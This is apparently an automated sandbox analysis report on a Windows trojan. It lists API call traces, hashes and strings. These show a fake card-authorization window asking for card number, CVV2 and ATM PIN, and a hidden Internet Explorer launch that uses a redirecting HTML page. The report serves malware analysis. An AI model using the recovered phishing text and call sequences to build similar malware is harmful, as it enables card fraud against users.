                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction ID: 1ee26eb31ace3a5089fdf6d32769bdd241f616d51084a453fd18da055c90a8b4
                            • Opcode Fuzzy Hash: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction Fuzzy Hash: 52F09670F44300BBDB206F55DD03F167AA8EB08F1CF90002AFA44611D1D67D6420569F

                             Control-flow Graph
                             • Node 98: 40121f-40127f (__GetMainArgs, call 407980)
                             • Node 100: 401284-401293 (exit)
                             • Edges: 98->100
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmp
                             • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmp
                             • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction ID: 22fee5bca0d1ee63cc250ffe024ab50772efda8fe48dde45178863df2fdfff2b
                            • Opcode Fuzzy Hash: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction Fuzzy Hash: BEF090B0F44300BBDA206F55AC03F1A7AA8EB08B1CFA0002AFA44611E1DA7D6420569F

                            Control-flow Graph

                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405181
                            • lstrlenA.KERNEL32(?,?), ref: 00405195
                            • lstrlenA.KERNEL32(?,?,?), ref: 004051A6
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 004051C4
                            • lstrlenA.KERNEL32(?,?,?,?,?), ref: 004051D5
                            • lstrlenA.KERNEL32(?,?,?,?,?,?), ref: 004051E6
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405218
                            • memset.CRTDLL(?,00000000,00000010,?,?,?,?,?,?), ref: 0040522E
                            • GetTickCount.KERNEL32 ref: 00405239
                            • srand.CRTDLL(00000000,?,00000000,00000010,?,?,?,?,?,?), ref: 0040523F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040526C
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?), ref: 00405290
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmp
                             • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmp
                             • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$FreeLocal$CountEnvironmentExpandIncrementInterlockedOpenStringsTickmemsetsrand
                            • String ID: %s%u - Microsoft Internet Explorer$7O{M$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 2987844104-963083691
                            • Opcode ID: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction ID: eaf183550e18aa99804e3b29fd782d62b91feccc71c8544a1a81296d936fe118
                            • Opcode Fuzzy Hash: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction Fuzzy Hash: 8E91B471E092186BDF20EB65CC49BDEB779AF40308F1440F6E208B61D1DAB96EC58F59
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405C3C
                            • GetTickCount.KERNEL32 ref: 00405C54
                            • srand.CRTDLL(00000000,?), ref: 00405C5A
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405C69
                            • memset.CRTDLL(?,00000000,00000010,0042C48C,00000000,?), ref: 00405C7F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,00000000,?), ref: 00405CC2
                              • Part of subcall function 0040570C: GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,.htm), ref: 00405764
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,<html>), ref: 00405778
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405786
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057AC
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057BE
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057E7
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405805
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,<head>), ref: 00405819
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405827
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405845
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 0040584D
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405CF7
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D0A
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D2B
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405D95
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DA8
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DCA
                            • FindWindowA.USER32(IEFrame,?), ref: 00405DED
                            • Sleep.KERNEL32(000003E8,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405DFD
                            • Sleep.KERNEL32(0000F000,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405E20
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405E38
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00405E85
                            • DeleteFileA.KERNEL32(?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EA4
                            • lstrlenA.KERNEL32(<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EAE
                            • strncmp.CRTDLL(00000000,<HTML><!--,00000000,<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000), ref: 00405EBA
                            • lstrlenA.KERNEL32(<HTML><!--,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405ECB
                            • LocalFree.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000), ref: 00405F0F
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F2B
                            • TerminateProcess.KERNEL32(?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F38
                            • CloseHandle.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F49
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmp
                             • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmp
                             • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$Filelstrlensprintf$CloseDeleteHandleProcessSleepThreadWindowmemset$CopyCountCreateCurrentDesktopEnvironmentExpandFindFreeIncrementInterlockedLocalOpenPathStringsTempTerminateTextTicksrandstrncmp
                            • String ID: %s%u - Microsoft Internet Explorer$<HTML><!--$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 4103625910-1993706416
                            • Opcode ID: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction ID: dc295d18008c6f961fbff17ccdc6ec9b88b81df80f56d8f6893aa762a7281c5f
                            • Opcode Fuzzy Hash: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction Fuzzy Hash: 7B81A8B1E041186ADB20B665CC4ABDEB7BD9F40304F1444F7B608F61D1E6B99F848F59
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                            • GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                              • Part of subcall function 004013CC: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004013EF
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?), ref: 004054F1
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?), ref: 00405505
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?), ref: 00405513
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                              • Part of subcall function 004054D7: LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                              • Part of subcall function 004054D7: memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                              • Part of subcall function 004054D7: CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                              • Part of subcall function 004054D7: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                              • Part of subcall function 004054D7: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                              • Part of subcall function 00401348: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00401375
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmp
                             • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmp
                             • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Create$FileThread$AllocCloseCodeExitHandleLocalObjectOpenSingleSizeWaitmemcpy
                            • String ID: Software\Microsoft
                            • API String ID: 3232930010-89712428
                            • Opcode ID: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction ID: db3b40ff5e41acc5bdae17a6e42d24a18e18c948de20eb22515eb7809feee29e
                            • Opcode Fuzzy Hash: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction Fuzzy Hash: C3219972E002097BEB10AE998D42FDEBAA8DB04714F644077FB00B61E1E6B55A108B99

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00405FFA: GetWindow.USER32(?,00000005), ref: 00406019
                              • Part of subcall function 00405FFA: GetClassNameA.USER32(00000000,?,00000FFF), ref: 0040603B
                            • ShowWindow.USER32(00000000), ref: 004060B9
                            • GetWindowRect.USER32(00000000,?), ref: 004060C9
                            • CreateWindowExA.USER32(00000200,QueenKarton,0042CBF0,50800000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004060FF
                            • CreateWindowExA.USER32(00000000,STATIC, Authorization Failed.,50800000,00000014,00000014,?,0000003C,00000000,00000000,00000000,00000200), ref: 00406135
                            • CreateWindowExA.USER32(00000000,STATIC,0042CBF0,50800009,00000014,00000051,?,0000012C,00000000,00000000,00000000,STATIC), ref: 00406179
                            • CreateFontA.GDI32(00000014,00000008,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 004061A2
                            • SendMessageA.USER32(00000030,00000000,00000001,00000000), ref: 004061B4
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,00000014,00000014,00000064,00000064,00000000,00000000,STATIC,0042CBF0), ref: 004061E2
                            • SendMessageA.USER32(00000000,00000143,00000000,MasterCard), ref: 004061FF
                            • SendMessageA.USER32(00000143,00000000,Visa,00000000), ref: 00406216
                            • SendMessageA.USER32(0000014E,00000001,00000000,00000143), ref: 00406233
                            • SendMessageA.USER32(0000014E,00000000,00000000,00000143), ref: 00406249
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,0000007A,00000014,00000032,0000012C,00000000,00000000,0000014E,00000000), ref: 0040627A
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX), ref: 004062B9
                            • sprintf.CRTDLL(?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX,0042CBF0), ref: 004062DF
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 004062F5
                            • sprintf.CRTDLL(?,20%.2u,-00000002,00000143,00000000,?,?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C), ref: 0040630B
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 00406324
                            • CreateWindowExA.USER32(00000000,STATIC,Card && expiration date,50000000,00000114,0000006E,00000081,00000010,00000000,00000000,00000143,00000000), ref: 0040636B
                            • CreateWindowExA.USER32(00000000,STATIC,Your card number,50000000,000000C3,00000087,00000067,00000010,00000000,00000000,00000000,STATIC), ref: 004063AA
                            • CreateWindowExA.USER32(00000000,STATIC,3-digit validation code on back of card (cvv2),50000000,00000064,000000A0,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 004063E3
                            • CreateWindowExA.USER32(00000000,STATIC,ATM PIN-Code,50000000,000000A0,000000B9,00000056,00000010,00000000,00000000,00000000,STATIC), ref: 0040641C
                            • CreateWindowExA.USER32(00000000,STATIC,Unable to authorize. ATM PIN-Code is required to complete the transaction.,50000000,0000001E,000000E6,000001E4,00000010,00000000,00000000,00000000,STATIC), ref: 00406455
                            • CreateWindowExA.USER32(00000000,STATIC,Please make corrections and try again.,50000000,0000001E,000000FF,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 0040648E
                            • CreateWindowExA.USER32(00000200,EDIT,00429180,50800000,00000014,0000002D,00000082,00000018,00000000,00000000,00000000,STATIC), ref: 004064C7
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,00000046,00000028,00000018,00000000,00000000,00000200,EDIT), ref: 00406503
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,0000005F,00000064,00000018,00000000,00000000,00000200,EDIT), ref: 00406539
                            • CreateWindowExA.USER32(00000000,BUTTON,Click Once To Continue,50800000,0000001E,00000140,0000009B,00000017,00000000,00000000,00000200,EDIT), ref: 00406572
                            • CreateFontA.GDI32(00000010,00000006,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 0040659B
                            • SendMessageA.USER32(00000030,00000000,00000001,00000010), ref: 004065B3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065C3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065D3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065E3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065F9
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406609
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406619
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406632
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406642
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406652
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406662
                            • GetWindowLongA.USER32(000000FC,00000030), ref: 0040666F
                            • SetWindowLongA.USER32(000000FC,004077E4,00000000), ref: 00406686
                            • GetWindowLongA.USER32(000000FC,00000001), ref: 00406699
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066B0
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066BD
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066D4
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066E1
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066F8
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406705
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 0040671C
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406732
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 00406749
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmp
                             • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmp
                             • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$CreateMessageSend$Long$Fontsprintf$ClassNameRectShow
                            • String ID: Authorization Failed.$%.2u$20%.2u$3-digit validation code on back of card (cvv2)$ATM PIN-Code$BUTTON$COMBOBOX$Card && expiration date$Click Once To Continue$DocObject$EDIT$Explorer$MasterCard$Please make corrections and try again.$QueenKarton$STATIC$Unable to authorize. ATM PIN-Code is required to complete the transaction.$Visa$Your card number
                            • API String ID: 1504929638-2953596215
                            • Opcode ID: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction ID: 07d4a47d2009414dc6278682baa0b56b1decc7bc7d2f3e077783c243e1dcc7f7
                            • Opcode Fuzzy Hash: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction Fuzzy Hash: 43F16F31BC43157AFA212B61ED43FA93A66AF14F44F60413AB700BD0F1DAF92911AB5D

                             Control-flow Graph
                             • Node 310: 40570c-405743 (call 4079e4, GetTempPathA)
                             • Node 313: 405746-40574b
                             • Node 314: 40574d-405796 (call 4015ea, strcat, sprintf, rand)
                             • Node 317: 405798-4057a9 (strcat)
                             • Node 318: 4057ac-4057bc (rand)
                             • Node 319: 4057e7-4057f7 (rand)
                             • Node 320: 4057be-4057e4 (rand, sprintf)
                             • Node 321: 4057f9-40580a (strcat)
                             • Node 322: 40580d-405837 (strcat, rand)
                             • Node 323: 405839-40584a (strcat)
                             • Node 324: 40584d-40585d (rand)
                             • Node 325: 405888-4058c1 (sprintf, rand)
                             • Node 326: 40585f-405885 (rand, sprintf)
                             • Node 327: 4058c3-4058d4 (strcat)
                             • Node 328: 4058d7-4058fb (strcat, rand)
                             • Node 329: 405911-40593b (strcat, rand)
                             • Node 330: 4058fd-40590e (strcat)
                             • Node 331: 405966-40598a (strcat, rand)
                             • Node 332: 40593d-405963 (rand, sprintf)
                             • Node 333: 4059a0-4059d0 (strcat, rand)
                             • Node 334: 40598c-40599d (strcat)
                             • Node 335: 4059d2-4059e3 (strcat)
                             • Node 336: 4059e6-405a0a (strcat, rand)
                             • Node 337: 405a20-405a5a (sprintf, rand)
                             • Node 338: 405a0c-405a1d (strcat)
                             • Node 339: 405a70-405a9a (strcat, rand)
                             • Node 340: 405a5c-405a6d (strcat)
                             • Node 341: 405ab0-405af1 (rand, sprintf, rand)
                             • Node 342: 405a9c-405aad (strcat)
                             • Node 343: 405af3-405b04 (strcat)
                             • Node 344: 405b07-405b37 (strcat, rand)
                             • Node 345: 405b39-405b4a (strcat)
                             • Node 346: 405b4d-405b5d (rand)
                             • Node 347: 405b88-405c08 (strcat, CreateFileA, lstrlenA, WriteFile, CloseHandle)
                             • Node 348: 405b5f-405b85 (rand, sprintf)
                             • Edges: 310->313, 313->313, 313->314, 314->317, 314->318, 317->318, 318->319, 318->320, 319->321, 319->322, 320->319, 321->322, 322->323, 322->324, 323->324, 324->325, 324->326, 325->327, 325->328, 326->325, 327->328, 328->329, 328->330, 329->331, 329->332, 330->329, 331->333, 331->334, 332->331, 333->335, 333->336, 334->333, 336->337, 336->338, 337->339, 337->340, 338->337, 339->341, 339->342, 340->339, 341->343, 341->344, 342->341, 344->345, 344->346, 345->346, 346->347, 346->348, 348->347
                            APIs
                            • GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                            • strcat.CRTDLL(?,.htm), ref: 00405764
                            • sprintf.CRTDLL(?,<html>), ref: 00405778
                            • rand.CRTDLL ref: 00405786
                            • strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                            • rand.CRTDLL ref: 004057AC
                            • rand.CRTDLL ref: 004057BE
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                            • rand.CRTDLL ref: 004057E7
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405805
                            • strcat.CRTDLL(?,<head>), ref: 00405819
                            • rand.CRTDLL ref: 00405827
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405845
                            • rand.CRTDLL ref: 0040584D
                            • rand.CRTDLL ref: 0040585F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405880
                            • sprintf.CRTDLL(?,%s<title>%s%u</title>,?,MicroSoft-Corp,?), ref: 004058A3
                            • rand.CRTDLL ref: 004058B1
                            • strcat.CRTDLL(?,0042CC6C), ref: 004058CF
                            • strcat.CRTDLL(?,</head>), ref: 004058E3
                            • rand.CRTDLL ref: 004058EB
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405909
                            • strcat.CRTDLL(?,<body>), ref: 0040591D
                            • rand.CRTDLL ref: 0040592B
                            • rand.CRTDLL ref: 0040593D
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 0040595E
                            • strcat.CRTDLL(?,<script>), ref: 00405972
                            • rand.CRTDLL ref: 0040597A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405998
                            • strcat.CRTDLL(?,function x()), ref: 004059AC
                            • rand.CRTDLL ref: 004059C0
                            • strcat.CRTDLL(?,0042CC6C), ref: 004059DE
                            • strcat.CRTDLL(?,0042CA2E), ref: 004059F2
                            • rand.CRTDLL ref: 004059FA
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A18
                            • sprintf.CRTDLL(?,%sself.parent.location="%s";,?,?), ref: 00405A42
                            • rand.CRTDLL ref: 00405A4A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A68
                            • strcat.CRTDLL(?,0042CA14), ref: 00405A7C
                            • rand.CRTDLL ref: 00405A8A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AA8
                            • rand.CRTDLL ref: 00405AB0
                            • sprintf.CRTDLL(?,%ssetTimeout("x()",%u);,?), ref: 00405AD9
                            • rand.CRTDLL ref: 00405AE1
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AFF
                            • strcat.CRTDLL(?,</script>), ref: 00405B13
                            • rand.CRTDLL ref: 00405B27
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405B45
                            • rand.CRTDLL ref: 00405B4D
                            • rand.CRTDLL ref: 00405B5F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405B80
                            • strcat.CRTDLL(?,</body><html>), ref: 00405B94
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BAC
                            • lstrlenA.KERNEL32(?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BCD
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BE9
                            • CloseHandle.KERNEL32(?,?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp
